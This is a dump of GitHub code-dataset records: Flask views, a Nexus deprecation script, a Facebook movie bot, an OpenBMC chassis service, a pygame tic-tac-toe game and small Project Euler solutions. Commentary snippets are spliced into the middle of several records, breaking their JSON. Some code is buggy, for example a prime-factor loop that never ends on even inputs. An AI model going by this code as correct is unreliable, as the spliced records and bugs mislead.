if result.errors:\n LOGGER.info(\"Validation error.\", user=data, errors=result.errors)\n return (\n jsonify({\"message\": \"Validation Error.\", \"errors\": result.errors}),\n 400,\n )\n\n subscribe_to_jobs_weekly_list(\n result.data[\"email\"], result.data[\"first_name\"], result.data[\"last_name\"]\n )\n LOGGER.info(\"User successfuly subscribed.\", 
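# The plotting half of the niscope example above is ordinary Matplotlib: a single
# Line2D whose y-data is replaced on every FuncAnimation frame. The same pattern
# without the instrument, with synthetic samples standing in for
# session.channels["1"].read() (which needs real hardware):

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation

num_samples = 250
x_time = np.arange(num_samples) / 50_000_000  # assumes the 50 MS/s rate configured above

fig, ax = plt.subplots()
line, = ax.plot(x_time, np.zeros(num_samples))
ax.set_ylim(-1.5, 1.5)  # set_ydata() does not rescale axes, so fix the range up front

def animate(frame):
    # In the real example the scope is read here; a noisy sine stands in.
    samples = np.sin(2 * np.pi * 5e6 * x_time + frame / 5) + 0.1 * np.random.randn(num_samples)
    line.set_ydata(samples)
    return (line,)

ani = animation.FuncAnimation(fig, animate, interval=100, blit=True, save_count=50)
plt.show()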
user=data)\n return jsonify({\"message\": \"Succesfully subscribed.\"}), 200\n except Exception:\n LOGGER.exception(\"Cannot subscribe user to list.\", user=data)\n return jsonify({\"message\": \"Unexpected error.\"}), 500\n\n\n@blueprint.route(\"/rss/jobs/weekly\")\ndef get_weekly_jobs_rss():\n redis_url = current_app.config.get(\"CACHE_REDIS_URL\")\n jobs_weekly_email_key = current_app.config.get(\"WEEKLY_JOBS_EMAIL_REDIS_KEY\")\n\n redis = StrictRedis.from_url(redis_url)\n\n raw_email_entry = redis.hgetall(jobs_weekly_email_key)\n title = raw_email_entry[b\"title\"].decode(\"UTF-8\")\n content = raw_email_entry[b\"html\"].decode(\"UTF-8\")\n timestamp = float(raw_email_entry[b\"timestamp\"])\n date = datetime.fromtimestamp(timestamp, tz=pytz.UTC)\n\n feed = FeedGenerator()\n feed.link(href=request.url_root)\n feed.title(\"INSPIRE Weekly HEP Jobs\")\n feed.author({\"name\": \"inspirehep.net\"})\n feed.description(\"Feed for weekly HEP jobs from INSPIRE\")\n feed.pubDate(date)\n feed.lastBuildDate(date)\n\n entry = feed.add_entry()\n entry.id(str(timestamp))\n entry.title(title)\n entry.content(content)\n entry.published(date)\n\n return Response(response=feed.rss_str(), mimetype=\"application/rss+xml\")\n","repo_name":"inspirehep/inspirehep","sub_path":"backend/inspirehep/mailing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"937027102","text":"import pandas as pd\nimport setup\nimport nexussdk as nexus\nimport json\nconfig = setup.config\n\nfrom DbConnection import connect_to_db\nimport NexusSparqlQuery as qns\n\nengine = connect_to_db()\n\nnexus_deployment = setup.nexus_deployment\norg = setup.nexus_org\nproject = setup.nexus_project\ntoken = setup.token\n\nsparqlview_endpoint = setup.sparqlview_endpoint\nsparqlview_wrapper = setup.sparqlview_wrapper\n\n# create nexus connection\nnexus = setup.nexus\n\n# Opening JSON file\nf = open('resource_deprecation_mapping.json')\nresource_mapping_dict = json.load(f)\nresource_mapping_dict\n\nfor resource_mapping in resource_mapping_dict:\n \n print(resource_mapping['postgres_table_name'])\n \n # let's get a list of all research studies from postgres\n query = f\"\"\"\n select \n distinct {resource_mapping['postgres_uri_field_name']} resource_uri \n from \n mpg_eln_dev.{resource_mapping['postgres_table_name']}\n where\n {resource_mapping['postgres_uri_field_name']} is not null\n \"\"\"\n pg_df = pd.read_sql(query, engine)\n print(f\"Length of postgres query: {len(pg_df)}\")\n \n query_prefix = \"\"\"\n prefix nxv: <https://bluebrain.github.io/nexus/vocabulary/>\n prefix fhir: <http://hl7.org/fhir/>\n prefix nidm: <http://purl.org/nidash/nidm#>\n prefix sdo: <https://schema.org/>\n \n \"\"\"\n \n if resource_mapping.get('nexus_resource_type_regex', False):\n \n print(resource_mapping['nexus_resource_type_regex'])\n \n query_body = f\"\"\"\n \n select * where {{\n ?resource_uri nxv:deprecated false .\n FILTER NOT EXISTS {{ ?resource_uri nxv:deprecated true }} .\n ?resource_uri a ?resource_type .\n FILTER (regex(str(?resource_type), \"{resource_mapping['nexus_resource_type']}\", \"i\")) .\n }}\n \n \"\"\"\n else:\n query_body = f\"\"\"\n \n select * where {{\n ?resource_uri nxv:deprecated false .\n FILTER NOT EXISTS {{ ?resource_uri nxv:deprecated true }} .\n ?resource_uri a {resource_mapping['nexus_resource_type']} .\n }}\n \n \"\"\"\n \n sparql_query = query_prefix + query_body\n \n df = 
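# The feedgen calls in the RSS view above form a small reusable pattern. The same
# calls reduced to a self-contained function; the URL and strings are placeholders,
# not values from the application:

from datetime import datetime, timezone
from feedgen.feed import FeedGenerator


def build_single_entry_rss(title, content, when=None):
    """Return an RSS document (bytes) with one entry, built the same way as the view above."""
    when = when or datetime.now(timezone.utc)  # feedgen expects timezone-aware datetimes
    feed = FeedGenerator()
    feed.link(href="https://example.org/")
    feed.title("Example feed")
    feed.author({"name": "example.org"})
    feed.description("Single-entry feed assembled like the weekly jobs RSS")
    feed.pubDate(when)
    feed.lastBuildDate(when)

    entry = feed.add_entry()
    entry.id(str(when.timestamp()))
    entry.title(title)
    entry.content(content)
    entry.published(when)

    return feed.rss_str()

# build_single_entry_rss("Hello", "<p>Body</p>") -> b'<?xml version=...'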
qns.query_sparql(sparql_query,sparqlview_wrapper)\n df = qns.sparql2dataframe(df)\n print(f\"Length of sparql query: {len(df)}\")\n \n # join the data frames\n join_df = pg_df.merge(\n df,\n how = 'right',\n on = 'resource_uri',\n indicator = True\n )\n\n # delete resources that are only in Nexus\n nexus_only_df = join_df.loc[join_df['_merge']=='right_only']\n print(f\"Resources to delete: {len(nexus_only_df)}\")\n \n for index, row in nexus_only_df.iterrows():\n resource = nexus.resources.fetch(org, project, row['resource_uri'])\n print(resource[\"@id\"])\n \n try:\n nexus.resources.deprecate(resource) \n except:\n print(\"Could not deprecate\")\n ","repo_name":"Cogitate-consortium/xnat-nexus-etl","sub_path":"nexus_etl/dw_to_nexus/DeprecateResources.py","file_name":"DeprecateResources.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43560241260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 9 00:23:22 2017\n\n@author: Tobi\n\"\"\"\n\nimport numpy as np\n\ntext_file = open(r\"C:\\Users\\Tobi\\Documents\\Python Scripts\\EulerProject\\p099_base_exp.txt\", \"r\")\nlines = text_file.read()\ntemp = lines.splitlines()\n#temp.split(',')\ntext_file.close()\n\nlst=[]\nfor i in range(0,len(temp)):\n spl = temp[i].split(',')\n lst.extend(spl)\n \nlargest = float(lst[1]) * np.math.log(float(lst[0]))\nfor i in range(0,int(len(lst) / 2)):\n a = float(lst[2*i +1 ]) * np.math.log(float(lst[2*i]))\n if a > largest:\n largest_idx = i\n largest = a\n\nprint(largest_idx+1) # Python fängt bei 0 an zu zählen, die Frage war aber nach der Zeilennummer\nprint(largest)","repo_name":"TobiasK87/project_euler","sub_path":"Problem99.py","file_name":"Problem99.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23434032409","text":"# coding: utf-8\nimport contextlib\nimport json\nimport urllib2\n\nimport settings\nfrom fb_bot.fb_api_wrapper import construct_message_with_attachment, \\\n construct_message_with_text\nfrom fb_bot.movie_info import get_movie_poster, get_movie_trailer_link\n\n\ndef get_data(url):\n with contextlib.closing(urllib2.urlopen(url)) as jf:\n return json.loads(jf.read())\n\n\ndef _construct_final_payload(recipient_id, movies, n_movies):\n quick_replies = [\n {\n 'content_type': 'text',\n 'title': 'Ещё фильмы',\n 'payload': '/premiere{}'.format(n_movies)\n }\n ]\n payload = construct_message_with_attachment(\n recipient_id, movies, quick_replies\n )\n return payload\n\n\ndef _construct_film_info(poster, description, trailer_url, movie):\n if 'kinohod_id' in movie:\n my_id = 'kinohod_id'\n else:\n my_id = 'id'\n if not trailer_url or not poster:\n f_info = {\n 'title': settings.uncd(movie['title']),\n 'subtitle': description,\n 'buttons': [\n {\n 'type': 'postback',\n 'title': 'Сеансы',\n 'payload': 'seances{}'.format(movie[my_id])\n }\n ]\n }\n else:\n f_info = {\n 'title': settings.uncd(movie['title']),\n 'image_url': poster,\n 'subtitle': description,\n 'buttons': [\n {\n 'type': 'postback',\n 'title': 'Сеансы',\n 'payload': 'seances{}num{}'.format(movie[my_id], 0)\n },\n {\n 'type': 'web_url',\n 'url': trailer_url,\n 'title': 'Трейлер'\n },\n {\n 'type': 'postback',\n 'title': 'Подробнее',\n 'payload': 'info{}'.format(movie[my_id])\n },\n\n ]\n }\n\n return f_info\n\n\ndef _construct_out_of_films_payload(recipient_id, movies):\n if len(movies) > 0:\n\n quick_replies = [\n {\n 
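# The deprecation script above finds resources that exist only in Nexus by doing a
# right merge with indicator=True and keeping rows where '_merge' == 'right_only'.
# The same anti-join on toy data (column and frame names here are illustrative):

import pandas as pd

pg_df = pd.DataFrame({"resource_uri": ["a", "b"]})
nexus_df = pd.DataFrame({"resource_uri": ["b", "c", "d"]})

joined = pg_df.merge(nexus_df, how="right", on="resource_uri", indicator=True)
nexus_only = joined.loc[joined["_merge"] == "right_only", "resource_uri"]

print(list(nexus_only))  # ['c', 'd'] -> present in Nexus only, candidates for deprecation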
'content_type': 'text',\n 'title': 'В начало',\n 'payload': '/premiere{}'.format(\n settings.FB_FILMS_TO_DISPLAY\n )\n }\n ]\n payload = construct_message_with_attachment(\n recipient_id, movies, quick_replies\n )\n else:\n text = settings.NO_MORE_FILMS\n quick_replies = [\n {\n 'content_type': 'text',\n 'title': 'В начало',\n 'payload': '/premiere{}'.format(\n settings.FB_FILMS_TO_DISPLAY\n )\n }\n ]\n payload = construct_message_with_text(\n recipient_id, text, quick_replies\n )\n return payload\n\n\ndef display_premieres(recipient_id, number_of_movies):\n\n url = settings.URL_PREMIERES.format(\n settings.KINOHOD_API_KEY\n )\n html_data = get_data(url)\n videos = []\n for film_counter in xrange(number_of_movies - settings.FB_FILMS_TO_DISPLAY,\n number_of_movies):\n if film_counter < len(html_data):\n movie = html_data[film_counter]\n genres_str = poster = trailer_url = ''\n if 'genres' in movie:\n genres_str = ', '.join([g for g in movie['genres']])\n description = 'Жанр: {}'.decode('utf-8').format(genres_str)\n if 'poster' in movie:\n poster = get_movie_poster(movie['poster'])\n if ('trailers' in movie and\n isinstance(movie['trailers'], list) and\n len(html_data) > 0 and 'mobile_mp4' in\n movie['trailers'][0]):\n trailer_url = (movie['trailers'][0]\n ['mobile_mp4']['filename'])\n trailer_url = get_movie_trailer_link(trailer_url)\n f_info = _construct_film_info(\n poster, description, trailer_url, movie\n )\n\n videos.append(f_info)\n\n else:\n movies = videos\n payload = json.dumps(\n _construct_out_of_films_payload(\n recipient_id, movies\n )\n )\n return payload\n\n movies = videos[0:10]\n payload = json.dumps(\n _construct_final_payload(\n recipient_id, movies, number_of_movies +\n settings.FB_FILMS_TO_DISPLAY\n )\n )\n return payload\n","repo_name":"KNIGHTTH0R/TelegramBot","sub_path":"fb_bot/display_premieres.py","file_name":"display_premieres.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11569284452","text":"#!/usr/bin/env python\n\n# TODO: openbmc/openbmc#2994 remove python 2 support\ntry: # python 2\n import gobject\nexcept ImportError: # python 3\n from gi.repository import GObject as gobject\n\nimport dbus\nimport dbus.mainloop.glib\nimport dbus.service\nfrom obmc.dbuslib.bindings import DbusObjectManager, DbusProperties, get_dbus\n\nDBUS_NAME = \"org.openbmc.control.Chassis\"\nOBJ_NAME = \"/org/openbmc/control/chassis0\"\nCONTROL_INTF = \"org.openbmc.Control\"\n\nMACHINE_ID = \"/etc/machine-id\"\n\nPOWER_OFF = 0\nPOWER_ON = 1\n\nBOOTED = 100\n\n\nclass ChassisControlObject(DbusProperties, DbusObjectManager):\n def getUuid(self):\n uuid = \"\"\n try:\n with open(MACHINE_ID) as f:\n data = f.readline().rstrip(\"\\n\")\n if len(data) == 32:\n uuid = data\n else:\n print(\"ERROR: UUID is not formatted correctly: \" + data)\n except Exception:\n print(\"ERROR: Unable to open uuid file: \" + MACHINE_ID)\n\n return uuid\n\n def __init__(self, bus, name):\n super(ChassisControlObject, self).__init__(conn=bus, object_path=name)\n # load utilized objects\n self.dbus_objects = {\n \"power_control\": {\n \"bus_name\": \"org.openbmc.control.Power\",\n \"object_name\": \"/org/openbmc/control/power0\",\n \"interface_name\": \"org.openbmc.control.Power\",\n },\n \"host_services\": {\n \"bus_name\": \"org.openbmc.HostServices\",\n \"object_name\": \"/org/openbmc/HostServices\",\n \"interface_name\": \"org.openbmc.HostServices\",\n },\n \"systemd\": {\n \"bus_name\": 
\"org.freedesktop.systemd1\",\n \"object_name\": \"/org/freedesktop/systemd1\",\n \"interface_name\": \"org.freedesktop.systemd1.Manager\",\n },\n }\n\n # uuid\n self.Set(DBUS_NAME, \"uuid\", self.getUuid())\n self.Set(DBUS_NAME, \"reboot\", 0)\n\n bus.add_signal_receiver(\n self.power_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"Released\",\n path=\"/org/openbmc/buttons/power0\",\n )\n bus.add_signal_receiver(\n self.long_power_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"PressedLong\",\n path=\"/org/openbmc/buttons/power0\",\n )\n bus.add_signal_receiver(\n self.softreset_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"Released\",\n path=\"/org/openbmc/buttons/reset0\",\n )\n\n bus.add_signal_receiver(\n self.host_watchdog_signal_handler,\n dbus_interface=\"org.openbmc.Watchdog\",\n signal_name=\"WatchdogError\",\n )\n\n def getInterface(self, name):\n o = self.dbus_objects[name]\n obj = bus.get_object(o[\"bus_name\"], o[\"object_name\"], introspect=False)\n return dbus.Interface(obj, o[\"interface_name\"])\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def powerOn(self):\n print(\"Turn on power and boot\")\n self.Set(DBUS_NAME, \"reboot\", 0)\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-start@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def powerOff(self):\n print(\"Turn off power\")\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-chassis-hard-poweroff@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def softPowerOff(self):\n print(\"Soft off power\")\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-shutdown@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def reboot(self):\n print(\"Rebooting\")\n if self.getPowerState() != POWER_OFF:\n self.Set(DBUS_NAME, \"reboot\", 1)\n self.powerOff()\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def softReboot(self):\n print(\"Soft Rebooting\")\n if self.getPowerState() != POWER_OFF:\n self.Set(DBUS_NAME, \"reboot\", 1)\n self.softPowerOff()\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def quiesce(self):\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-quiesce@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"i\")\n def getPowerState(self):\n intf = self.getInterface(\"power_control\")\n return intf.getPowerState()\n\n # Signal handler\n\n def power_button_signal_handler(self):\n # toggle power, power-on / soft-power-off\n state = self.getPowerState()\n if state == POWER_OFF:\n self.powerOn()\n elif state == POWER_ON:\n self.softPowerOff()\n\n def long_power_button_signal_handler(self):\n print(\"Long-press button, hard power off\")\n self.powerOff()\n\n def softreset_button_signal_handler(self):\n self.softReboot()\n\n def host_watchdog_signal_handler(self):\n print(\"Watchdog Error, Going to quiesce\")\n self.quiesce()\n\n\nif __name__ == \"__main__\":\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n bus = get_dbus()\n obj = 
ChassisControlObject(bus, OBJ_NAME)\n mainloop = gobject.MainLoop()\n\n obj.unmask_signals()\n name = dbus.service.BusName(DBUS_NAME, bus)\n\n print(\"Running ChassisControlService\")\n mainloop.run()\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"openbmc/skeleton","sub_path":"pychassisctl/chassis_control.py","file_name":"chassis_control.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"25350843185","text":"def get_color(type_edge, weight):\n # Задаем цвета в RGB формате для разных типов отношений\n colors = {\n 'друзья': (0, 255, 0), # Зеленый\n 'партнеры': (10, 186, 181), # Тиффани\n 'романтик': (255, 0, 0), # Красный\n 'негатив': (0, 0, 255) # Синий\n }\n\n if type_edge in colors:\n rgb = colors[type_edge]\n rgb = tuple(int((1 - weight) * 255 + weight * i) for i in rgb)\n hex_color = '#{:02x}{:02x}{:02x}'.format(*rgb)\n return hex_color\n else:\n return '#000000' # цвет если не указали тип\n\n\nprint(get_color('романтик', 0.9))\n","repo_name":"barsik2/graphviz","sub_path":"server/app/getColor.py","file_name":"getColor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36049295823","text":"from __future__ import print_function\nimport json\nimport urllib2\nimport os\nimport sys\n\nurl = \"http://bustime.mta.info/api/siri/vehicle-monitoring.json?key=\" + sys.argv[1] + \"&VehicleMonitoringDetailLevel=calls&LineRef=\" + sys.argv[2]\n\nresponse = urllib2.urlopen(url)\ndata = response.read().decode(\"utf-8\")\ndata = json.loads(data)\n\nposition = data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery'][0]['VehicleActivity']\n\nbusline = 'Bus line : ' + sys.argv[2]\nnumberofbuses = len(position)\nprint (busline)\nprint ('Number of Active Buses :', numberofbuses)\na = 0\nfor i in position:\n latitude = i['MonitoredVehicleJourney']['VehicleLocation']['Latitude']\n longitude = i['MonitoredVehicleJourney']['VehicleLocation']['Longitude']\n print ('Bus', a, 'is at latitude', latitude, 'and longitude', longitude)\n a = a + 1\n","repo_name":"wbx200/PUI2016_wbx200","sub_path":"HW2_wbx200/show_bus_locations_wbx200.py","file_name":"show_bus_locations_wbx200.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73956572882","text":"\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nsw = 800\r\nsh = 600\r\n\r\nboard = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\board.jpg')\r\nx_img = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\x.png')\r\no_img = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\o.png')\r\n\r\nwin = pygame.display.set_mode((sw, sh))\r\n\r\nclock = pygame.time.Clock()\r\n\r\nboardVals = [[0,0,0], [0,0,0], [0,0,0]]\r\n\r\npiecesOnBoard = []\r\n\r\nmoveCount = 0\r\n\r\ngameOver = False\r\n\r\nisTwoPlayer = True\r\n\r\nclass Piece(object):\r\n def __init__(self, x, y, isX):\r\n self.x = x\r\n self.y = y\r\n self.isX = isX\r\n self.xTrue = self.x - (self.x % 200)\r\n self.yTrue = self.y - (self.y % 200)\r\n if isX:\r\n self.image = x_img\r\n else:\r\n self.image = o_img\r\n\r\n def draw(self, win):\r\n\r\n win.blit(self.image, (self.xTrue, self.yTrue))\r\n\r\n\r\ndef redrawGameWindow():\r\n win.blit(board, (0,0))\r\n pygame.draw.rect(win, (0,0,0), [600, 0, 200, 600])\r\n font = pygame.font.SysFont('arial', 50)\r\n smallFont = 
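# get_color() above (comments in Russian) linearly blends each relationship colour
# from white at weight 0 toward the base RGB value at weight 1, then formats the
# result as a hex string. The same blend as a small, English-commented helper:

def blend_toward(base_rgb, weight):
    """Blend from white toward base_rgb: weight=0 gives #ffffff, weight=1 gives the base colour."""
    rgb = tuple(int((1 - weight) * 255 + weight * channel) for channel in base_rgb)
    return "#{:02x}{:02x}{:02x}".format(*rgb)

# blend_toward((255, 0, 0), 0.9) -> '#ff1919', the same value get_color('романтик', 0.9) prints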
pygame.font.SysFont('arial', 25)\r\n if moveCount % 2 == 0:\r\n turn = 'X'\r\n else:\r\n turn = 'O'\r\n turnText = font.render(turn + \"'s Turn\", 1, (255, 255, 255))\r\n win.blit(turnText, (sw - turnText.get_width() -10, 10))\r\n\r\n if gameOver is True:\r\n gameOverText = smallFont.render(\"Game Over\", 1, (255, 255, 255))\r\n win.blit(gameOverText, (sw - gameOverText.get_width() - 35, 20 + turnText.get_height()))\r\n\r\n for piece in piecesOnBoard:\r\n piece.draw(win)\r\n\r\n\r\n pygame.display.update()\r\n\r\ndef isGameOver(boardVals):\r\n zeroFound = False\r\n for i in boardVals:\r\n for j in i:\r\n if j == 0:\r\n zeroFound = True\r\n if not zeroFound:\r\n return True\r\n\r\n # Horizonal Win\r\n for i in boardVals:\r\n if i[0] == i[1] and i[0] == i[2] and i[0] != 0:\r\n return True\r\n\r\n # Vertical Win\r\n if boardVals[0][0] == boardVals[1][0] and boardVals[0][0] == boardVals[2][0]:\r\n if boardVals[0][0] != 0:\r\n return True\r\n if boardVals[0][1] == boardVals[1][1] and boardVals[0][1] == boardVals[2][1]:\r\n if boardVals[0][1] != 0:\r\n return True\r\n if boardVals[0][2] == boardVals[1][2] and boardVals[0][2] == boardVals[2][2]:\r\n if boardVals[0][2] != 0:\r\n return True\r\n\r\n #Diagonal Check\r\n if boardVals[0][0] == boardVals[1][1] and boardVals[0][0] == boardVals[2][2]:\r\n if boardVals[0][0] != 0:\r\n return True\r\n\r\n if boardVals[0][2] == boardVals[1][1] and boardVals[0][2] == boardVals[2][0]:\r\n if boardVals[0][2] != 0: # Change boardVals[0][0] to boardVals[0][2]\r\n return True\r\n\r\n # Add return false\r\n return False\r\n\r\nrun = True\r\nwhile run:\r\n clock.tick(10)\r\n\r\n if not gameOver:\r\n mouseX, mouseY = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if isTwoPlayer:\r\n if click != (0,0,0):\r\n if moveCount % 2 == 0:\r\n if boardVals[mouseY//200][mouseX//200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, True))\r\n boardVals[mouseY//200][mouseX//200] = 1\r\n moveCount += 1\r\n else:\r\n if boardVals[mouseY // 200][mouseX // 200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, False))\r\n boardVals[mouseY // 200][mouseX // 200] = -1\r\n moveCount += 1\r\n\r\n gameOver = isGameOver(boardVals)\r\n else:\r\n if moveCount % 2 == 0:\r\n if click != (0, 0, 0):\r\n if boardVals[mouseY // 200][mouseX // 200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, True))\r\n boardVals[mouseY // 200][mouseX // 200] = 1\r\n moveCount += 1\r\n print(boardVals)\r\n \r\n \r\n\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_SPACE]:\r\n boardVals = [[0,0,0], [0,0,0], [0,0,0]]\r\n piecesOnBoard.clear()\r\n moveCount = 0\r\n gameOver = False\r\n if keys[pygame.K_1]:\r\n isTwoPlayer = False\r\n if keys[pygame.K_2]:\r\n isTwoPlayer = True\r\n\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n redrawGameWindow()\r\n\r\n\r\npygame.quit()","repo_name":"thenewcomer-coder/New-tic-tac-toe-game","sub_path":"Tic Tac Toe game.py","file_name":"Tic Tac Toe game.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42491988385","text":"import random\n\n\nCOLUMN_SYNONYMS = {\n \"identifier\": [\"client id\", \"number\", \"unique id\"],\n \"full_name\": [\"name\", \"full name\", \"client name\", \"client\"],\n \"first_name\": [\n \"first name\",\n \"given name\",\n ],\n \"last_name\": [\"family name\", \"surname\", \"last name\"],\n \"sex\": [\"gender\"],\n \"birth_date\": [\n \"date of birth\",\n 
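# isGameOver() above enumerates rows, columns and both diagonals by hand. A more
# compact check over the same 3x3 boardVals layout (0 = empty, 1 = X, -1 = O),
# returning True for any three-in-a-row or a completely filled board:

def is_game_over(board):
    lines = (
        [board[r] for r in range(3)]                             # rows
        + [[board[r][c] for r in range(3)] for c in range(3)]    # columns
        + [[board[i][i] for i in range(3)],                      # main diagonal
           [board[i][2 - i] for i in range(3)]]                  # anti-diagonal
    )
    if any(line[0] != 0 and line[0] == line[1] == line[2] for line in lines):
        return True
    return all(cell != 0 for row in board for cell in row)       # draw: board is full

# is_game_over([[1, 1, 1], [0, -1, 0], [-1, 0, 0]]) -> True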
\"birthdate\",\n ],\n \"birth_year\": [\"year of birth\", \"birthyear\"],\n \"age\": [],\n \"visit_date\": [\"visit date\", \"date of visit\", \"date\"],\n \"entry_date\": [\"entry date\", \"date of entry\"],\n \"clinical_variable\": [\"hiv\", \"via\", \"hiv status\", \"via status\"],\n}\n\n\nclass ColumnSynonym(object):\n def __init__(self):\n self.ref2syn = dict((k, [k] + v) for k, v in COLUMN_SYNONYMS.items())\n self.cap_styles = [\"lower\", \"upper\", \"capitalize\", \"title\"]\n\n def style(self):\n return random.choice(self.cap_styles)\n\n def rename(self, ref_col, cap_type=None, syn_option=None):\n syn = self.ref2syn[ref_col]\n if syn_option is None:\n col = random.choice(self.ref2syn[ref_col])\n else:\n i = min(len(syn) - 1, syn_option)\n col = syn[i]\n if cap_type is None:\n cap_type = random.choice([0, 1, 2])\n else:\n if type(cap_type) is not int:\n cap_type = self.cap_styles.index(cap_type)\n if cap_type == 0:\n col = col.lower()\n elif cap_type == 1:\n col = col.upper()\n elif cap_type == 2:\n col = col.capitalize()\n else:\n col = col.title()\n return col\n","repo_name":"ersilia-os/cidrz-e2e-linkage","sub_path":"e2elink/synthetic/schema/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17386595154","text":"import sqlite3\nfrom flask import Flask, g\nfrom contextlib import closing\n\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_object('config')\napp.config.setdefault('SQLALCHEMY_TRACK_MODIFICATIONS', True)\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\n\ndb = SQLAlchemy(app)\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n g.db.close()\n\nlm = LoginManager()\nlm.init_app(app)\nlm.login_view = 'login'\n\nfrom bbs import views, userAction, postAction, filters","repo_name":"vaseline555/Blockchain-based-Electronic-Lab-Notebook","sub_path":"src/frontend/bbs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"25864764826","text":"def iterPrime(num):\n '''\n iterates through the num to find largest factor\n '''\n x = 3\n answer = 0\n while num-x != 0:\n if float(num)/x == float(num/x):\n num/=x\n answer = num\n else:\n x+=2\n return answer","repo_name":"DanielAndrews43/Project-Euler","sub_path":"Problem 003.py","file_name":"Problem 003.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73425116240","text":"from constraint import *\n\np = Problem()\n\nvariables = set(\"BB\") | set(\"I\") | set(\"ILL\")\np.addVariables(variables, range(0,10))\n\np.addVariable(\"X1\", [0,1])\n\np.addConstraint(lambda B,I,L,X1: B+I == L+10*X1, ('B','I','L','X1'))\np.addConstraint(lambda B,X1,L,I: B+X1 == L+10*I, ('B','X1','L','I'))\np.addConstraint(AllDifferentConstraint(), variables)\n\nsols = p.getSolutions()\n\nfor sol in sols:\n print(\"Possible solution:\")\n for var in 
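# iterPrime() above starts trial division at 3 and steps by 2, so factors of 2 are
# never removed and even inputs such as powers of two do not terminate. A corrected
# sketch of the same trial-division idea:

def largest_prime_factor(n):
    """Largest prime factor of n (n >= 2), by trial division."""
    largest = 1
    while n % 2 == 0:          # strip factors of 2 first
        largest, n = 2, n // 2
    x = 3
    while x * x <= n:          # odd candidates up to sqrt(n)
        while n % x == 0:
            largest, n = x, n // x
        x += 2
    return max(largest, n) if n > 1 else largest  # any leftover n > 1 is prime

# largest_prime_factor(13195) -> 29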
